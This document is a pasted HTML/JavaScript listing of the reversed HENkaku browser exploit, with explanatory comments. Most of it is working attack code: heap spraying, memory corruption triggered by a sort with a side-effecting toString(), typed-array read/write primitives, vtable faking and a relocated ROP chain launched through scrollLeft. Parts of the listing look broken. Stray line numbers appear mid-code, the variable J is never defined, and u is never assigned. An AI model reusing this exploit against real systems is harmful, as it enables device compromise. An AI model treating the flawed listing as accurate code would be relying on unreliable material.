
Henkaku exploit - HTML reversed

a guest
Aug 1st, 2016
<script src='payload.js'></script>

<script>
// Script-wide scratch variables. Most are single-letter names produced by the
// reversing process; the ones this listing actually assigns are r, t, n, o,
// i, e, f, v, p, d, g, k and b. `u` is declared here but never assigned in
// this listing. `payload` and `relocs` come from payload.js (loaded above).
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;

// Number of 32-bit words in the ROP header region: 0x40 header bytes plus the
// stack size stored at payload[4]. The trailing comment records the value the
// author expected (476); the copy loop near the end of the script compares
// against the literal 476 rather than `m`.
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4; /* 476 */

// Shared 16-byte DataView used by u2d()/d2u() (created lazily on first use)
// and re-used directly by the array scan further down.
var _dview = null;
/*
Pack two 32-bit unsigned halves into one IEEE-754 double.

`hi` is written at byte offset 0 and `low` at byte offset 4 of the shared
DataView `_dview` (created on first call), and the 8 bytes are read back as
a float64. DataView's default big-endian order is used for both the writes
and the read, so the result does not depend on host endianness.
*/
function u2d(low, hi)
{
  var view = _dview || (_dview = new DataView(new ArrayBuffer(16)));
  view.setUint32(0, hi);
  view.setUint32(4, low);
  return view.getFloat64(0);
}

/*
Split a double into its two 32-bit unsigned halves (inverse of u2d).

The float64 is written at byte offset 0 of the shared DataView `_dview`
(created on first call); `hi` is the word at offset 0 and `low` the word at
offset 4, both read in DataView's default big-endian order.
*/
function d2u(d)
{
  var view = _dview || (_dview = new DataView(new ArrayBuffer(16)));
  view.setFloat64(0, d);
  var hi = view.getUint32(0);
  var low = view.getUint32(4);
  return { low: low, hi: hi };
}

// Temporary space to store Element object: the save/restore loops later in
// the script copy 0x30 words in and out of this buffer (only 48 of the 1024
// slots are used).
var aspace_temp = new Uint32Array(1024);

// Scratch words written by swap(); they hold the last two words it read.
var word1 = 0;
var word2 = 0;
  44. function swap(offset)
  45. {
  46. word1 = aspace32[offset/4];
  47. word2 = aspace32[offset/4 + 1];
  48. return((word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF | ((word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF) << 16) >>> 0
  49. }
  50.  
/*
Main script body. It runs top to bottom once payload.js has defined
`payload` and `relocs`, and stops with alert() + an endless loop whenever a
search below fails. Reading guide (the section comments below mark each step):
  1. allocate r Uint32Array buffers of t bytes, interleaved with textarea
     elements whose `rows` is set to the marker value n;
  2. sort an array whose first element is an object with a side-effecting
     toString(), then look for one of the arrays allocated during that
     sort whose length no longer equals j;
  3. use that array (I) to rewrite a word, then find the Uint32Array whose
     byteLength changed (target_aspace, aliased as aspace32);
  4. read and write words through aspace32 to locate a textarea, compute
     base addresses from fixed offsets, copy its vtable, write the payload
     words (adjusted per relocs[]) and finally touch scrollLeft.
Defender's note: the observable page-level signature of this listing is the
spray itself — thousands of textarea elements and typed arrays, an
Array.prototype.constructor.apply call with a very large argument list, and
Array.prototype.sort() on an array seeded with an object whose toString()
allocates.
*/

// Spray parameters. t is the byte size of each Uint32Array, n the `rows`
// marker, o the replacement marker. Note that the loops below use the
// literals 0x1344, 0x66656463 and 0x55555555 directly rather than t/n/o.
r = 0x4000;
textareas = new Array(r);
aspace_arr = new Array(r);
t = 0x1344;
n = 0x66656463;
o = 0x55555555;


// Step 1: r typed arrays of t bytes, each followed by a textarea element
// whose rows property carries the marker value.
for (var i = 0; i < aspace_arr.length; ++i)
{
  aspace_arr[i] = new Uint32Array(0x1344/4);
  var e = document.createElement("textarea");
  e.rows = 0x66656463;
  textareas[i] = e;
}

/*
Spray memory with Element objects
*/
for (var i = 0; i < 1024; ++i)
{
  var e = document.createElement("textarea");
  e.rows = 0x66656463;
  textareas.push(e);
}

// Step 2 setup. W is built through Array.prototype.constructor.apply with
// 0x3000 (undefined) arguments; N is not referenced again in this listing.
// q is passed as the argument list for the 256 arrays created in
// z.toString(), so each of them starts with length j (2048).
var N = 0x3000;
var W = Array.prototype.constructor.apply(null,new Array(0x3000));
var j = 2048;
var q = new Array(2048);
var z = {};

var C = new Array(256);

// Called by W.sort() below: the default sort comparator converts elements
// to strings, and W[0] is z. While the sort is in progress this grows W by
// one element and allocates the 256 arrays in C, then returns "".
z.toString = function()
{
  W.push(12345);

  for (var r = 0; r < C.length; ++r)
  {
    var a = Array.prototype.constructor.apply(null, q);
    a[0] = 0;
    a[1] = 1;
    a[2] = 2;
    C[r] = a;
  } return""
};

// W[0] is the object with the side-effecting toString(); W[1..8191] are
// filled with a double whose two 32-bit halves are both 0x80000000.
W[0] = z;
var G = u2d(0x80000000, 0x80000000);

for (var i = 1; i < 8192; ++i)
  W[i] = G;

// Runs z.toString() (see above). `contents` and `cur` are assigned here but
// not referenced again in this listing.
W.sort();
contents = "";
cur = 0;

// Replace the side-effecting toString() with a no-op so later string
// conversions of z do not repeat the allocations.
z.toString = function(){};

// Step 2: pick the first array from C whose length is no longer j.
var I = null;

for (var i = 0; i < C.length; ++i)
{
  if(C[i].length != j)
  {
    I = C[i];
    break;
  }
}

// Step 3: walk I downward from a very large index. The loop has no lower
// bound; it exits only via the break inside. The word compared against t/4
// (the element count of each sprayed Uint32Array) is rewritten to a much
// larger value, and the 32-bit half of the element two slots earlier is
// kept in `v` for later use as `fkvtable`/`f`.
var count = 0x20000000 - 0x11000;

for(; ; count--)
{
  if(I[count] != 0)
  {
    _dview.setFloat64(0, I[J]);

    if (_dview.getUint32(0) == t/4)
    {
      _dview.setUint32(0, 0xEFFFFFE0);

      I[J] = _dview.getFloat64(0);
      _dview.setFloat64(0, I[J - 2]);

      v = _dview.getUint32(4);
      _dview.setUint32(4, 0);
      _dview.setUint32(0, 0x80000000);

      I[J-2] = _dview.getFloat64(0);

      break;
    }
  }
}

// Find the sprayed Uint32Array whose byteLength no longer matches t.
target_aspace = null;

for (var i = 0; i < aspace_arr.length; ++i)
{
  if(aspace_arr[i].byteLength != t)
  {
    target_aspace = aspace_arr[i];
    break;
  }
}

// Failure path: report and halt the script with a busy loop.
if (!target_aspace)
{
  alert("failed");
  while(1){};
}

// aspace32 is the typed array used for all further word reads/writes;
// fkvtable and f both take the value saved in v above.
var aspace32 = target_aspace;
var fkvtable = v;
f = v;

/*
Find one of the sprayed Element objects in memory
by looking for the rows of the object
*/

// Scan a window of 0x4000 words starting at f/4 for the rows marker; the
// first hit is replaced with 0x55555555 and its byte address recorded.
for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
{
  if (aspace32[addr] == 0x66656463)
  {
    aspace32[addr] = 0x55555555;
    textarea_addr = addr * 4;
    found_element = true;
    break;
  }
}

if (!found_element)
{
  alert("Did not find Element signature");
  while(1){};
}

/*
Change the rows of the Element object then scan the array of
sprayed objects to find an object whose rows have been changed
*/

var found_corrupted = false;
var corrupted_textarea;

// The textarea whose rows now reads 0x55555555 is the one whose memory the
// write above reached.
for (var i = 0; i < textareas.length; ++i)
{
  if(textareas[i].rows == 0x55555555)
  {
    corrupted_textarea = textareas[i];
    found_corrupted = true;
    break;
  }
}

if (!found_corrupted)
{
  alert("Did not find corrupted textarea");
  while(1){};
}

// Step 4: the vtable pointer sits 0x70 bytes before the rows word. The
// base addresses below are derived from fixed offsets and subtractions,
// which appear to be specific to the firmware build this listing targets;
// they cannot be verified from the listing itself.
var vtidx = textarea_addr - 0x70;
var textareavptr = aspace32[vtidx/4];
scewkbase = textareavptr - 0xABB65C;
scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
p = swap(scewkbase + 0x85D2E4) - 0x22D65;
d = swap(p + 0x2C688C) - 0x9E5;
g = swap(d + 0x3BC4) - 0xDC2D;
scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
k = swap(g + 0x18BF4) - 0xD59;
b = swap(k + 0x9AB8) - 0x49CD;

// Copy vtable: 64 words from the original vtable into the area at fkvtable,
// then point the element's vtable pointer at the copy.
for (var i = 0; i < 64; i++)
  aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];

aspace32[vtidx/4] = fkvtable;

// Save Element object: 0x30 words starting at the vtable pointer.
for (var i = 0; i < 0x30; ++i)
  aspace_temp[i] = aspace32[vtidx/4 + i];

// Call setjmp: slot 0x4E of the copied vtable is overwritten (low bit set).
aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;

// Undefine scrollLeft: the property write goes through the patched vtable.
corrupted_textarea.scrollLeft = 0;

// Save payload address (jmp context): derived from words 8 and 9 of the
// element as they read after the scrollLeft write, XORed with `u`.
payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
payload_addr -= 0xEF818;

// Restore Element object
for (var i = 0; i < 0x30; ++i)
  aspace32[vtidx/4 + i] = aspace_temp[i];

// Destination layout: stack region at +0x40, code region at +0x10000.
payload_stack = payload_addr + 0x40;
payload_code = payload_addr + 0x10000;
payload_off = payload_addr/4;

// Build ROP payload: copy payload[] word by word, adding the base selected
// by relocs[i]. Index 476 matches the `m` computed at the top of the file.
for (var i = 0; i < payload.length; ++i,++payload_off)
{
  // Reached the end of ROP header (first 0x770 bytes)
  if (i == 476)
    payload_off = payload_code/4;

  switch(relocs[i])
  {
    case 0:
      aspace32[payload_off] = payload[i];
      break;
    case 1:
      aspace32[payload_off] = payload[i] + payload_stack;
      break;
    case 2:
      aspace32[payload_off] = payload[i] + scewkbase;
      break;
    case 3:
      aspace32[payload_off] = payload[i] + scekernbase;
      break;
    case 4:
      aspace32[payload_off] = payload[i] + scelibcbase;
      break;
    case 5:
      aspace32[payload_off] = payload[i] + g;
      break;
    case 6:
      aspace32[payload_off] = payload[i] + scenetbase;
      break;
    case 7:
      aspace32[payload_off] = payload[i] + b;
      break;
    default:
      // Unknown relocation type: report and continue with the next word.
      alert("wtf?");
      alert(i + " " + relocs[i])
  }
}

// Trigger ROPchain
aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8; /* LDM R1 gadget */

// Two words at fkvtable + 0x100 are set up before the final property write.
var rchainaddr = fkvtable + 0x100;

aspace32[rchainaddr/4 + 5] = payload_code;
aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;

alert("Welcome to HENkaku!");

// Set scrollLeft to ROP chain
corrupted_textarea.scrollLeft = rchainaddr;

alert("that's it");
</script>